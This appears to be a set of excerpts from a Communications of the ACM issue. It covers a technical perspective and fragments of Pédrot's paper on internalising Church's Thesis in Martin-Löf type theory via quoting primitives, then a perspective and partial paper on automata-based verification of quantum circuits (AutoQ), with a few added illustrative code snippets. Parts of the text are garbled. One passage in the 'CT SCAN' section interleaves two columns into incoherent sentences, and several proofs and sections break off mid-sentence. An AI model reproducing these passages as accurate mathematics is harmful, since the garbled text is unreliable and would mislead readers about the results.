The resulting languages form privileged frameworks both for formalizing mathematics and for representing computational objects. They are grouped under the term "type theory" to distinguish them from the "set theory" traditionally claimed as the foundation of mathematics.

The accompanying paper, "Upon This Quote I Will Build My Church Thesis" by Pédrot, is set within Martin-Löf's type theory, which is the system underlying a proof tool like Agda. In this theory, proofs and computations are described in the same functional language. One can establish that any functional expression from natural numbers to natural numbers is a computable function. We also have an important property that any expression (without a free variable) representing a natural number will evaluate to a numeral: 2, 4, 45000, and so on.

The question posed in the accompanying paper is whether we can internalize in the logic the fact that "every represented function corresponds to the code of a computable function." This property, known as "Church's Thesis," is particularly useful for formalizing decidability results. The question of whether we can add this property to a system like Agda is delicate. It is necessary not only to ensure the coherence of the resulting system but also to maintain its good evaluation properties.

The paper provides a very elegant and general solution to this problem. Martin-Löf's theory is extended with three constants to represent the code of functions, the number of calculation steps in the evaluation on an argument, and the proof that the evaluation returns the expected value. Reduction rules are proposed for these new objects, preserving the property that an expression without free variables representing a natural number can be evaluated to an effective value.

The meta-theoretical properties of such a system are technical and complex. A major contribution of the paper is to propose a completely formalized version of the definitions and results in the Coq proof assistant, which offers an additional guarantee. The text includes links to the formalized counterpart for each definition and lemma, allowing for easy navigation between a general explanation and technical details.

The paper remarkably illustrates the fine properties of proof systems and their deep connections with the theory of computable functions. Type theory is both the subject of study and the tool that ensures the correctness of the mathematical results and that facilitates their reuse in other contexts. It highlights the elegance and importance of this logical framework.

Christine Paulin-Mohring ([email protected]) is a computer scientist and professor at Paris-Saclay University, Gif-sur-Yvette, Île-de-France, France. She is best known for developing the interactive theorem prover Coq.

© 2025 Copyright held by the owner/author(s).
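The contrast the perspective draws, between a constructive existence that carries its witness and mere classical existence, is visible directly in a modern proof assistant. The following Lean 4 fragment (an illustration of the general point, not taken from the paper) shows that a Σ-style subtype lets us project out the witness, while a Prop-level existential does not.

```lean
-- A Σ-style type packages a witness together with its proof,
-- so the witness can be computed by projection:
def witness {P : Nat → Prop} (h : {x : Nat // P x}) : Nat := h.val

-- A Prop-level existential erases its witness: a definition such as
--   def noWitness {P : Nat → Prop} (h : ∃ x, P x) : Nat := ...
-- is rejected, because data cannot be extracted from a proposition.
```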
As we already hinted at, it is known that MP is not derivable in MLTT.4 Since it is a consequence of classical logic, it holds in classical models such as the set-theoretical one,25 but it is also possible to add MP to MLTT while retaining the computational properties through a form of delimited exceptions.19 Note that, due to the minimalism of MLTT, the alternative statements of MP mentioned previously are not equivalent in this setting.3

As for CT, we already stated that it is negated by classical models, and thus is not a consequence of MLTT. By contrast with MP, the compatibility of CT with dependent type theory is a much more contentious subject. To make things simpler, we will therefore focus on this single principle in this paper, and deliberately ignore Markov's principle. The proviso about phrasing of the statement mattering a lot is even more paramount with CT, which is the chief reason why the problem and its answers are a matter of debate. In the remainder we will prove that MLTT is indeed compatible with the strongest form of Church's thesis usually agreed upon, but for this we first need to explain what we actually mean by these sibylline words. We dedicate the next section to a thorough exegesis of this topic.

2. A COMPREHENSIVE CT SCAN
Contrarily to more archaic systems, MLTT does not need a realizability interpretation to turn its proofs into programs. In some sense, it is already a realizability interpretation, as MLTT terms are literally bona fide programs. It should therefore be very natural to add CT to MLTT.

As a matter of fact, as long as the context is empty, the following rule is admissible

    ⊢ M : ℕ → ℕ
    ─────────────────────────────────────────────────────
    ⊢ ⟨M⟩ : Σp : ℕ. Πn : ℕ. Σk : ℕ. T(p, n, k) × U k = M n

where ⟨M⟩ is some term derived from M in a systematic way. Depending on the pursued goal, this process is variously known in the type theory world as extraction18 or quotation.21 Obviously, a rule that is derivable for closed sequents is not necessarily internalizable in the theory, so there is a non-trivial gap to fill there.

An additional issue is that dependent type theories have various notions of existence. Typically, they contrast dependent sum types Σx : A. B with existential types ∃x : A. B. The precise details depend on the exact theory considered, but the general rule is that the former corresponds to actual, constructive evidence, while the latter stands for mere existence; that is, no computational content can be extracted from this type. Such non-computational types are called propositions, an umbrella term for mildly related concepts. The three most common instances of propositions are captured by the realizability-driven Prop universe of CIC,18 the hProp subuniverse inspired by the univalent world,24 and the SProp universe of strict propositions.6 Regardless of the […]

[…] returns an enumerable proposition, so that for most notions of proposition, namely Prop with singleton elimination or hProp with unique choice, the use of ∃ or Σ results in equivalent statements. We will thus always stick to a Σ-type for this quantifier. More problematic is the first existential quantifier, the nature of which leads to radically different worlds. We will call CTΣ (resp. CT∃) the statement of Church's thesis with a Σ (resp. ∃) type as the first existential quantifier.

As mere existence does not validate choice by default, CT∃ is much closer to the traditional first-order setting. When ∃ is taken to live in the Prop universe of CIC, the relative expressivity of CT∃ has been studied extensively in the setting of synthetic computability.5 An important remark is that the lack of choice prevents building an internal quoting function (ℕ → ℕ) → ℕ that associates to some function its concrete code. As already suggested before, this means that CT∃ does not necessarily contradict function extensionality. Actually, we can even go much further: In the case where propositions are identified with hProps, CT∃ turns out to be compatible not only with MLTT but also with full-blown univalence.22 More generally and quite counterintuitively, univalence is compatible with many principles that would make the hardcore Bishop-style intuitionist raise a suspicious eyebrow, as long as they are squashed enough and thus made computationally harmless.22,24

Contrastingly, as Σ-types come with intuitionistic (non)-choice built-in, CTΣ is the telltale of an extremely weird mathematical realm. For starters, it immediately implies the existence of a quoting function and breaks both function extensionality and classical logic. The consistency of CTΣ with MLTT is an open problem that has been lingering for a while and seems to be considered a difficult question by experts.11,22 The best result thus far is the consistency of CTΣ with a stripped-down version of MLTT without the so-called ξ rule:

    Γ, x : A ⊢ M ≡ N : B
    ─────────────────────────────────────
    Γ ⊢ λx : A. M ≡ λx : A. N : Πx : A. B

The model used to prove this fact is a variant of Kleene realizability tailored for dependent types. Briefly, in this model, terms are interpreted directly as their code in Kleene's first algebra, that is, a natural number, and the equational theory in a context is defined as the closure of code equality by ground substitutions.

This representation makes the implementation of CTΣ trivial, as it boils down to the identity. Yet, for this to work, it is critical that two functions convertible in the model have literally the same code. This is exactly where the restriction to ground substitutions comes into play, as it will identify functions with their concrete syntax. Unfortunately, the same restriction also destroys non-trivial higher-order equations and in particular invalidates the ξ rule.

Although we understand the difficulties experienced by
setting, Σ -types validate choice by construction through the authors of this paper and acknowledge their distinct
large elimination or projections, while existential types do goals, we consider that removing this congruence from
not, in general. 𝖬𝖫𝖳𝖳when precisely trying to implement a principle imply-
The arithmetic statement of 𝖢 𝖳mentions two existen- ing the existence of a quoting function is unarguably throw-
tial quantifiers, hence we have a priori at least four pos- ing the baby with the bath water. Ubiquitary conversion un-
sible translations into 𝖬𝖫𝖳𝖳. In practice, the second one der λ -abstractions is a stepping stone of 𝖬 𝖫𝖳𝖳for program
reasoning, so treating functions as black boxes is a no-go and error-prone, let alone when they contain bits of comput-
and the ξrule a sine qua non. ability. To keep the naysayer at bay, all proofs were mecha-
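The tension between quoting and extensionality can be illustrated outside of type theory. The following Python snippet (our illustration, not part of the paper) defines two functions that agree on every input yet have different code; any operator that returns a function's code therefore cannot respect extensional equality:

```python
# Two extensionally equal functions: they agree on every input.
def f(n: int) -> int:
    return n + n

def g(n: int) -> int:
    return 2 * n

# Extensional equality on a sample of inputs: f and g are indistinguishable.
assert all(f(n) == g(n) for n in range(100))

# A crude "quote": the compiled bytecode of each function. The quotes
# differ, so quoting is not a function of extensional behaviour -- exactly
# the tension between CT_Sigma and function extensionality.
assert f.__code__.co_code != g.__code__.co_code
```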
Given the strong relationship between quoting functions and metaprogramming, we should also mention some attempts at making the latter a first-class citizen of dependent type theory. These systems are built with practical programming in mind rather than constructive mathematics, but the endeavours are similar enough that they are worth highlighting. There is in particular a wealth of literature on contextual types,17 a special kind of modal type8 capturing well-typed terms in an object context. Although contextual types can coexist with dependent types, the ability to pattern-match on code in these settings is still a difficult problem that is only satisfyingly handled in the absence of dependent types.12

3. HIGH-LEVEL DESCRIPTION
We now give the high-level intuitions that we develop technically later on. In this paper, we define “𝖬𝖫𝖳𝖳”, read “𝖬𝖫𝖳𝖳 with quotes”, a minute extension of 𝖬𝖫𝖳𝖳 with quoting operators that implement 𝖢𝖳Σ in a straightforward way. As already explained, 𝖢𝖳Σ holds externally in 𝖬𝖫𝖳𝖳. If we want it as an internal rule, there are two problems to solve: first, handling terms in an arbitrary context, and second, showing that our hypothetical internalization preserves conversion.

Despite the aura of complexity surrounding this question, our solution is disappointingly simple. The first problem will be handled in the most trivial way one can think of. Namely, the primitives computing the internal version of 𝖢𝖳Σ will simply block as long as their arguments are not closed. Since the return type of these primitives is first-order, this will not be a problem, as it will not endanger canonicity.

The second problem is solved in a similarly obvious manner. Given two terms M ≡ N : ℕ → ℕ, one needs to ensure that the quotations of these terms agree. In particular, the integer code returned by these operations must be the same. This sounds complicated, as in general two equivalent functions may have different codes. In Turing-complete languages, this is actually impossible to achieve in a computable way, due to Rice's theorem. But in 𝖬𝖫𝖳𝖳, there is a very simple way to find a canonical representative of an equivalence class of functions: just pick the normal form! Conversion in 𝖬𝖫𝖳𝖳 is decidable, as it virtually amounts to comparing the normal forms of the considered terms for syntactic equality. This requires that all well-typed terms have a normal form, but this property is usually taken for granted in dependent type theories and will for sure hold true in “𝖬𝖫𝖳𝖳”.

As the astute reader may complain, this is not enough in the presence of η-rules, which are included in our system. But even in this case, our normalization trick can be adapted simply by maximally η-reducing and stripping λ and pair annotations from the normal form.

Despite the intuitive simplicity of the above guiding ideas, proofs about dependent type theory are very tedious and error-prone, let alone when they contain bits of computability. To keep the naysayers at bay, all proofs were mechanized in the Coq proof assistant.

4. BASIC TYPE THEORY
Let us fix some conventions. Since we will be juggling quite a bit between levels, we will use a different font style to refer to objects from the metatheory, with types in bold and type ascription written in set-theoretic style x ∈ X. Some metatheoretical types of interest are X ⇒ Y, the metafunctions from X to Y, and N, the metaintegers. We will write term for the type of “𝖬𝖫𝖳𝖳” terms defined later on.

Our base theory will be an instance of 𝖬𝖫𝖳𝖳 featuring one Russell-style universe, negative Π and Σ types with definitional η-rules, together with a natural number type, an empty type, and an identity type. We recall the syntax of this theory in Figure 1. The typing rules are standard and we let the reader refer to the mechanization for details.

We use the usual notations A → B and A × B for non-dependent product and sum. We write M = N for 𝖨𝖽 A M N when A is clear from the context. Similarly, we sometimes drop the annotations of λ-abstractions and pairs. If n ∈ N, we write [n]ℕ ∈ term for the unary numeral associated to n. We write Λ := ℕ for numbers intended to code for programs.

Partial computations are usually defined through the partiality monad ℘(A) := ℕ → 𝚘𝚙𝚝𝚒𝚘𝚗 A. Since we will only ever consider partial integers, we use a simpler encoding.

Definition 1 (Partial integers). We define the type of partial integers ℕ℘ := ℕ → ℕ.

The intuitive meaning of a partial integer P : ℕ℘ is the following.
• If for all n : ℕ, P n = 0, then P is undefined.
• Otherwise, let n0 be the smallest integer such that P n0 = 𝖲 v for some v. Then P evaluates to v.

This can be easily internalized in 𝖬𝖫𝖳𝖳.

Definition 2 (Step evaluation). Given M : ℕ℘, V : ℕ, and K : ℕ, we define the step-evaluation predicate M ⇝ V ∥ K : □, read “M evaluates to V in K steps”, by recursion on K, capturing the above intuition. Most notably, if n ∈ N, then M ⇝ V ∥ [n]ℕ is convertible to

(M 0 = 0) × ... × (M [n − 1]ℕ = 0) × (M [n]ℕ = 𝖲 V).

Given the algorithmically friendly nature of 𝖬𝖫𝖳𝖳, we will pick a slightly nicer, but equivalent, phrasing of 𝖢𝖳Σ. We will merge the Kleene predicate 𝖳 and its decoding function 𝚄 into a single function 𝚛𝚞𝚗 : Λ → ℕ → ℕ℘.

Definition 3. Henceforth, we will define 𝖢𝖳 in 𝖬𝖫𝖳𝖳 as

Πf : ℕ → ℕ. Σp : Λ. Πn : ℕ. Σk : ℕ. 𝚛𝚞𝚗 p n ⇝ f n ∥ k

for some 𝖬𝖫𝖳𝖳 term 𝚛𝚞𝚗 : Λ → ℕ → ℕ℘.
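Definitions 1 and 2 can be modelled directly in an ordinary programming language. The following Python sketch is ours (names such as `evaluates_to` are illustrative, not the paper's notation), mirroring the intended semantics of partial integers:

```python
from typing import Callable

# A partial integer is a function N -> N that returns 0 while "still
# running" and S v (encoded as v + 1) once it has produced an answer.
PartialInt = Callable[[int], int]

def evaluates_to(P: PartialInt, v: int, k: int) -> bool:
    """The step-evaluation predicate P ~> v || k: P answers 0 at every
    step below k, and S v exactly at step k."""
    return all(P(i) == 0 for i in range(k)) and P(k) == v + 1

# A partial integer that "thinks" for 3 steps and then returns 7.
def slow_seven(n: int) -> int:
    return 0 if n < 3 else 7 + 1

assert evaluates_to(slow_seven, 7, 3)
assert not evaluates_to(slow_seven, 7, 2)

# The everywhere-0 function is the undefined partial integer: it never
# satisfies the predicate for any value or step count.
undefined: PartialInt = lambda n: 0
assert not any(evaluates_to(undefined, v, k)
               for v in range(5) for k in range(5))
```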
JUNE 2025 | VOL. 68 | NO. 6 | COMMUNICATIONS OF THE ACM 77
research highlights
Figure 3. Typing rules of “𝗠𝗟𝗧𝗧.”

Normal forms are, as usual, terms that cannot be simplified further. Neutral forms are a subcase of the former, intuitively capturing the notion of a term whose evaluation is blocked due to a variable not bound to a value. In particular, they cannot trigger new conversions when they are substituted for a variable. Our definition is standard for the 𝖬𝖫𝖳𝖳 fragment, except maybe that we ignore λ and pair type annotations, just like for the clos predicate. Only worth discussing are the newly introduced terms of “𝖬𝖫𝖳𝖳”.

Figure 4. Deep normal / neutral 𝗠𝗟𝗧𝗧 terms (excerpt).

The quote primitives do not generate any new non-neutral normal forms, as their types are concrete, canonical datatypes. They do generate new neutrals, though. The intuition is that these primitives only compute on closed normal forms, so if one of their arguments is not closed, they will block and thus be neutral.

Notation 10. We write clnf M if both clos M and dnf M.
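The intuition behind these new neutrals can be made concrete with a toy classifier. The sketch below is our simplification (the paper's actual term syntax is richer): a quote primitive is neutral exactly when its argument is open.

```python
def is_closed(t, depth=0):
    """Closed = no free de Bruijn variable. Toy terms:
    ('var', i), ('lam', body), ('app', f, a), ('quote', a), ('zero',)."""
    tag = t[0]
    if tag == 'var':
        return t[1] < depth          # bound by one of the enclosing lambdas
    if tag == 'lam':
        return is_closed(t[1], depth + 1)
    return all(is_closed(s, depth) for s in t[1:])

def is_neutral(t):
    tag = t[0]
    if tag == 'var':
        return True                  # evaluation is stuck on a variable
    if tag == 'app':
        return is_neutral(t[1])      # a stuck head blocks the application
    if tag == 'quote':
        return not is_closed(t[1])   # quote only computes on closed terms
    return False

v0 = ('var', 0)
assert is_neutral(('app', v0, ('zero',)))              # variable in head position
assert is_neutral(('quote', v0))                       # open argument: blocked
assert not is_neutral(('quote', ('lam', ('var', 0))))  # closed term: may compute
```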
Figure 5. Deep normal and neutral forms of “𝗠𝗟𝗧𝗧” extensions.

Figure 7. New non-congruence conversion rules of “𝗠𝗟𝗧𝗧.”

Figure 8. Step-indexed evaluation of “𝗠𝗟𝗧𝗧” extensions.
The last point is essentially stating that the metatheoretical evaluation ⇓ and the internal evaluation 𝚛𝚞𝚗 coincide.

From now on, we implicitly assume that our globally fixed computational model is adequate. The remainder of the paper is dedicated to the proof of the following theorem.

Theorem 16. “𝖬𝖫𝖳𝖳” is consistent and strongly normalizing. Furthermore, any closed “𝖬𝖫𝖳𝖳” term ⊢ M : ℕ normalizes to a numeral.

7. A 𝗠𝗟𝗧𝗧 LOGICAL RELATION PRIMER
We will prove Theorem 16 using a logical relation model. The base model is basically the now-famous inductive-recursive one from Abel et al.,1 with a handful of surprisingly minor tweaks. In this section, we briefly recall the principles of Abel-style logical relations.

From a high-level point of view, Abel-style logical relations for 𝖬𝖫𝖳𝖳 are just a glorified kind of realizability with a lot of bells and whistles. Notably, in the semantic world, well-formed types Γ ⊩ A are defined inductively, while well-typed terms pA | Γ ⊩ M : A are defined recursively over a proof pA ∈ Γ ⊩ A. In turn, well-typedness is extremely similar to, say, Kleene realizability,23 that is, pA | Γ ⊩ M : A essentially means that M weak-head normalizes to some value V, further satisfying some conditions depending on A. Due to conversion being an integral part of typing, one also needs to provide predicates for type and term convertibility at some semantic type.

The major departure from usual realizability in this kind of model is the proper handling of variables. All semantic predicates are actually presheaves over contexts equipped with weakenings. Furthermore, neutral terms enjoy a very specific status; see, for example, Lemma 22. This will turn out to be important for our goals.

The relation itself is parameterized by syntactic predicates for the various notions of typing and reduction. These predicates must satisfy a list of closure properties, which are typically weaker than the ones enjoyed by the standard typing rules of 𝖬𝖫𝖳𝖳. Another way to understand this is that logical relations turn a liberal type system, called declarative, which has many closure rules and is easy to work with, into a lower-level type system that is hardly usable but which is similar in spirit to the steps performed by a typing algorithm. Proofs in this generic system are in some sense normalized compared to the declarative system. As a matter of fact, this is a way to prove decidability of type-checking, since an algorithmic presentation of type-checking will satisfy the low-level closure properties. A notable difference with the declarative system is that generic typing requires making explicit the notion of neutral terms, through the introduction of neutral convertibility, which can be understood as the usual convertibility restricted to neutral terms.

In the remainder of this section, we assume fixed some instance of syntactic typing and reduction rules for 𝖬𝖫𝖳𝖳. Due to their sheer size and the fact they are neither surprising nor new, we will not state the closure properties here, but rather refer to the corresponding Coq code.

Definition 17. A set of typing rules is generic when it enjoys a specific list of (weak) closure properties.

Given generic notions of typing and reduction, one can define reducibility in the abstract. Our base logical relation is unchanged with regard to Abel et al.,1 so we will not give the full definition here. To begin with, writing everything in full on paper would be both unreadable and uninformative, and probably ridden with typos. Rather, we sketch below some representative type formers to build intuition. We also ignore bookkeeping details that clutter the simplicity of logical relations, such as universe levels. Our results are backed up by a mechanized proof, so we can go for a fearless human-readable paper.
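The clause "M weak-head normalizes to some value V" can be illustrated with a tiny untyped λ-calculus evaluator using de Bruijn indices (our sketch for intuition only; the paper's relation is far more structured):

```python
def shift(t, d, cutoff=0):
    """Shift free de Bruijn indices by d."""
    tag = t[0]
    if tag == 'var':
        return ('var', t[1] + d) if t[1] >= cutoff else t
    if tag == 'lam':
        return ('lam', shift(t[1], d, cutoff + 1))
    return ('app', shift(t[1], d, cutoff), shift(t[2], d, cutoff))

def subst(t, j, s):
    """Capture-avoiding substitution of s for variable j in t."""
    tag = t[0]
    if tag == 'var':
        return s if t[1] == j else t
    if tag == 'lam':
        return ('lam', subst(t[1], j + 1, shift(s, 1)))
    return ('app', subst(t[1], j, s), subst(t[2], j, s))

def whnf(t, fuel=100):
    """Head reduction only: stop at lambdas and at neutral terms.
    The fuel bound guards against divergent terms."""
    while fuel and t[0] == 'app':
        head = whnf(t[1], fuel - 1)
        if head[0] != 'lam':
            return ('app', head, t[2])   # neutral application: stuck
        t = shift(subst(head[1], 0, shift(t[2], 1)), -1)
        fuel -= 1
    return t

ident = ('lam', ('var', 0))
# (\x. x) (\x. x) weak-head normalizes to the value \x. x.
assert whnf(('app', ident, ident)) == ident
```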
[…] rules for negative types are given directly as η-expansions. Therefore, two convertible normal forms may differ on their annotations or up to some η-expansion. Erasing all annotations and maximally η-reducing thus ensures that the result is unique for each equivalence class.

As a result, the logical relation instantiated with deep typing is a model of 𝖬𝖫𝖳𝖳. We only have to check that the additional “𝖬𝖫𝖳𝖳” rules are also interpreted. Since semantic self-convertibility is equivalent to semantic well-typedness, it is enough to check the rules from Figure 7; the ones from Figure 3 are a consequence of the former.

Lemma 27 (Quote Reducibility). The conversion rules for the ϙ primitive hold in the reducibility model.

Proof. We focus on the more general congruence rule. As- […] erasure, and thus the same closedness. If not all these terms are closed, then ϱ M0 N0 and ϱ M′0 N′0 are convertible neutral terms, and we conclude as above. Otherwise, by reducibility, N0 = N′0 = [n]ℕ for some n ∈ N. Since reducibility is closed by application, we get Γ ⊩ M N ≡ M′ N′ : ℕ. This implies that both applications deeply evaluate to the same semantic integer, that is, a series of successors ending either with 0 or a neutral. By confluence, we rule out the second case as M0 N0 is closed, so these terms reduce to some numeral [v]ℕ. By confluence and standardization, M0 [n]ℕ also evaluates to [v]ℕ. By irrelevance of erasure, ∥M0∥ [n]ℕ also evaluates to [v]ℕ. By computational adequacy, there exists some k0 s.t. run ⌈⌈M0⌉⌉ n k0 ⇓ 𝖲 [v]ℕ and run ⌈⌈M0⌉⌉ n k′ ⇓ 0 for all k′ < k0. Given that M0 and M′0 have the same erasure, this also holds for M′0. Hence, Ϛ M N and Ϛ M′ N′ evaluate to [k0]ℕ, and ϱ M N and ϱ M′ N′ evaluate to [k0, v]Ϙ. The only remaining problem is to show that this […]
DOI:10.1145/3725725

Technical Perspective
A Symbolic Approach to Verifying Quantum Systems
By Parosh Aziz Abdulla

To view the accompanying paper, visit doi.acm.org/10.1145/3725728
EXCEPTIONAL ADDED VALUE may lie in connecting two complementary areas of computer science. This statement is particularly true when applying mature techniques developed in one area to solve complex problems that arise in a new area. The accompanying paper, "An Automata-Based Framework for Verification and Bug Hunting in Quantum Circuits" by Lengál et al., is a case in point. It applies techniques developed in logic, automata, and symbolic verification to analyze the correctness of quantum programs.

The current quest of quantum computing is achieving quantum supremacy—that is, to reach the point where we solve problems that are practically unsolvable using conventional computing. To that end, substantial recent progress has been made in implementing quantum hardware and developing programming languages for quantum computers. In many applications, system correctness is of critical importance. For instance, identifying a subtle bug in a quantum circuit used for quantum chemistry simulations could prevent incorrect predictions about molecular interactions, which is critical for drug discovery and material design.

Given the complexity of quantum systems and the correctness requirements, tools for analyzing and verifying quantum programs' correctness are in high demand. However, building verification tools for quantum programs is immensely challenging due to their probabilistic nature and the exponential size of the computational space. Furthermore, there is a fundamental difference in how conventional and quantum computers process information: Conventional computers use digital bits (0s and 1s), while quantum computers deploy quantum bits (qubits) to store quantum information in values between 0 and 1.

The accompanying paper addresses whether we can exploit the research community's vast experience in conventional program verification to develop tools for handling quantum systems. Verification tools, in general, and for quantum systems in particular, would ideally have the following properties:
• Flexibility: Allows flexible specification of properties of interest
• Diagnostics: Provides precise bug diagnostics
• Automation: Operates automatically
• Scalability: Scales efficiently to verify useful programs

Symbolic verification is one of the most successful techniques that satisfy the above criteria for conventional programs. To date, we have lacked an extension to the quantum realm due to the latter's unique mathematical structure and different operational principles. The core of this work is the innovative application of automata theory, a cornerstone of formal verification, to quantum circuit verification. It combines tree automata-based reasoning with symbolic representations tailored for quantum circuits, allowing automated verification at unprecedented scales. It goes back to the very basics of program verification by recalling the classical Hoare triples {P}C{Q}, where {P} and {Q} are sets of quantum states representing the pre-condition and the post-condition, and C is a quantum circuit. It uses symbolic verification to check the validity of the triple, ensuring all executions of C from states in P result in states within Q.

Although this is the first attempt to use such techniques in the context of quantum computing, implementing the framework with a tool gives spectacular results. For instance, the tool manages to verify large circuits with up to 40 qubits and 141,527 gates, or catch bugs injected into circuits with up to 320 qubits and 1,758 gates, while all existing tools fail to handle such benchmarks.

The framework's success is based on the groundbreaking observation that we can lift core concepts of classical verification, such as state-space exploration and symbolic reasoning, into the quantum setting. This extension allows the verification of quantum circuits, offering a path to applying well-established classical paradigms in a domain where formal guarantees are critical.

In addition to its early practical promise, the approach opens new research directions in automata theory, where quantum structures introduce novel mathematical challenges and opportunities. It establishes a connection between quantum program verification and automata, promoting new possibilities to exploit the richness of automata theory and automata-based verification in quantum computing. It is worth noting that the methodology is not just about catching mistakes but also about building trust in quantum computing systems as we move toward an era in which they might solve problems classical systems cannot.

In conclusion, the accompanying paper represents a rare confluence of disciplines, opening pathways for collaboration between automata theorists, quantum physicists, and software engineers. Looking ahead, this line of research opens up exciting opportunities. Could similar automata-based techniques be adapted to other aspects of quantum software engineering? Could this approach handle quantum programming languages' more abstract and flexible constructs? The authors' combination of deep theoretical insights and practical tool development sets the stage for significant advancements in the field. Their results are a milestone for quantum circuit verification and a beacon guiding future research toward reliable quantum computation.

Parosh Aziz Abdulla ([email protected]) is a chaired professor at the Department of Information Technology, Uppsala University, Uppsala, Sweden.

© 2025 Copyright held by the owner/author(s).
An Automata-Based Framework for Verification and Bug Hunting in Quantum Circuits

To view the accompanying Technical Perspective, visit doi.acm.org/10.1145/3725725
One application of our framework is as a quick underapproximation of a quantum circuit non-equivalence test. Our approach can switch to a lightweight specification when equivalence checkers fail due to insufficient resources and still find bugs in the design. Quantum circuit (non-)equivalence testing is an essential part of the quantum computing toolkit. Its prominent use is in verifying results of circuit optimization, which is a necessary part of quantum circuit compilation to achieve the expected fidelity of quantum algorithms running on real-world quantum computers, which are heavily affected by noise and decoherence. Already in the world of classical programs, optimizer bugs are being found on a regular basis in compilers used daily by tens of thousands of programmers. In the world of quantum, optimization is much harder than in the classical setting, with many opportunities to introduce subtle and hard-to-discover bugs into the optimized circuits. It is therefore essential to be able to check that the output of an optimizer is functionally equivalent to its input.

Testing quantum circuit (non-)equivalence is, however, a challenging task (QMA-complete).17 Due to its complexity, approaches that can quickly establish circuit non-equivalence are highly desirable, for example, as a preliminary check before a more heavyweight procedure (see Burgholzer and Wille7 or Chen et al.8) is used. One currently employed fast non-equivalence check is to use random stimuli generation.6 Finding subtle bugs by random testing is, however, challenging, with no guarantees due to the immense (in general uncountable) underlying state space.

Our approach can be used as follows: We start with a TA encoding the set of possible input states (created by the user or automatically) and run our analysis of the circuit over it, obtaining a TA 𝒜 representing the set of all outputs. Then, we take the optimized circuit, run it over the same TA with inputs, and obtain a TA 𝒜′. Finally, we check whether ℒ(𝒜) = ℒ(𝒜′). If the equality does not hold, we can conclude that the circuits are not functionally equivalent (if the equality holds, there can, however, still be some bug that does not manifest in the set of output states).

We implemented our technique in a prototype called AutoQ and evaluated it over a wide range of quantum circuits, including some prominent quantum algorithms, randomly generated circuits, reversible circuits from RevLib,23 and benchmarks from the tool Feynman.2 The results show that our approach is quite scalable. We did not find any tool with the same functionality as ours and hence picked the closest state-of-the-art tools—the circuit simulator SliQSim21 and the circuit equivalence checkers Feynman2 (based on path-sums), Qcec7 (combining ZX-calculus, decision diagrams, and random stimuli generation), and SliQEC22—as the baseline tools to compare with. In the first experiments, we evaluated AutoQ's capability in verification against pre- and post-conditions. We managed to verify the functional correctness (with regard to one input state) of a circuit implementing Grover's search algorithm with 40 qubits and 141,527 gates. We then evaluated AutoQ on circuits with injected bugs. The results confirm our claim—AutoQ was able to find injected bugs in various huge-scale circuits, including one with 320 qubits and 1,758 gates, which the other tools failed to find.

Figure 1. Constructing the Bell state. (a) The TA of |00⟩. (b) The TA for 1/√2(|00⟩ + |11⟩). (c) The EPR circuit.

In addition to the practical utility, our work also bridges the gap between quantum and classical verification, particularly automata-based approaches such as regular model checking.5 As far as we know, our approach to the verification of quantum circuits is the first one based on automata. The enabling techniques and concepts involved in this work are, for example, the use of TAs to represent sets of quantum states and express the pre- and post-conditions, the compactness of the TA structure enabling efficient gate operations, and our TA transformation algorithms enabling the execution of quantum gates over TAs. We believe the connection of automata theory with the quantum world we establish can start new fruitful collaborations between the two rich fields.

Overview. We use a concrete example to demonstrate how to use our approach. Assume we want to design a circuit constructing the Bell state, that is, a 2-qubit circuit converting the basis state |00⟩ to the maximally entangled state 1/√2(|00⟩ + |11⟩). We first prepare TAs corresponding to the precondition (Figure 1a) and postcondition (Figure 1b). Both TAs use q as the root state and accept only one tree. One can see the correspondence between quantum states and TAs by traversing their structure. The precise definition will be given in Sections 2 and 3. Our approach will then use the transformers from Sections 4 to 6 to construct a TA 𝒜 recognizing the quantum states after executing the EPR circuit (Figure 1c) from the precondition TA (Figure 1a). We will then use the TA language inclusion/equivalence tool VATA18 to check 𝒜 against the postcondition TA. If the circuit is buggy, our approach will return a witness quantum state that is reachable from the precondition but not allowed by the postcondition. From our experience of preparing benchmark examples, in many cases this approach helps us find bugs in incorrect designs.

2. PRELIMINARIES
By default, we work with vectors and matrices over the complex numbers ℂ. In particular, we use ℂ^{m×n} to denote the set of all m × n complex matrices. Given a k × ℓ matrix (axy), its transpose is the ℓ × k matrix (axy)^T = (ayx), obtained by flipping (axy) over its diagonal. A 1 × k matrix is called a row vector and a k × 1 matrix is called a column vector. To save vertical space, we often write a column vector v using its row transpose v^T. We use I to denote the identity matrix of any dimension (which should be clear from the context). The conjugate of a complex number a + bi is the complex number a − bi, and
[…] A ⊗ B = (axy B). For instance,

[1+i, 3; 4−7i, 0] ⊗ [1/2, 1; −1/2, 0]
  = [(1+i)/2, 1+i, 3/2, 3;  −(1+i)/2, 0, −3/2, 0;  2−(7/2)i, 4−7i, 0, 0;  −2+(7/2)i, 0, 0, 0].   (2)

2.1. Quantum circuits
Quantum states. In a quantum system with n qubits, the qubits can be entangled, and the system's quantum state can be a quantum superposition of computational basis states {|j⟩ | j ∈ {0, 1}^n}. For instance, given a system with three qubits x1, x2, and x3, the computational basis state |011⟩ denotes a state where qubit x1 is set to 0 and qubits x2 and x3 are set to 1. The superposition is then denoted in the Dirac notation as a formal sum Σ_{j ∈ {0,1}^n} aj · |j⟩, where a0, a1, ..., a_{2^n−1} ∈ ℂ are complex amplitudes^a satisfying the property that Σ_{j ∈ {0,1}^n} |aj|² = 1. Intuitively, |aj|² is the probability that when we measure the state in the computational basis, we obtain the state |j⟩; these probabilities need to sum up to 1 over all computational basis states. We note that the quantum state can alternatively be represented by a 2^n-dimensional column vector^b (a0, ..., a_{2^n−1})^T or by a pseudo-Boolean function T : {0, 1}^n → ℂ, where T(j) = aj for all j ∈ {0, 1}^n. In the following, we will work mainly with the function representation, which we will see as a mapping from the domain of assignments to Boolean variables (corresponding to qubits) to ℂ. For instance, the quantum state 1/√2 · |00⟩ + 1/√2 · |01⟩ can be represented by the vector (1/√2, 1/√2, 0, 0)^T or the function […]

[…]sented using quantum gates. A k-qubit quantum gate (that is, a quantum gate with k inputs and k outputs) can be described using a 2^k × 2^k unitary matrix. When computing the […]

X′ = X ⊗ I = [0, 1; 1, 0] ⊗ [1, 0; 0, 1] = [0, 0, 1, 0; 0, 0, 0, 1; 1, 0, 0, 0; 0, 1, 0, 0]   (3)

v′ = X′ × v = [0, 0, 1, 0; 0, 0, 0, 1; 1, 0, 0, 0; 0, 1, 0, 0] × (c00, c01, c10, c11)^T = (c10, c11, c00, c01)^T   (4)

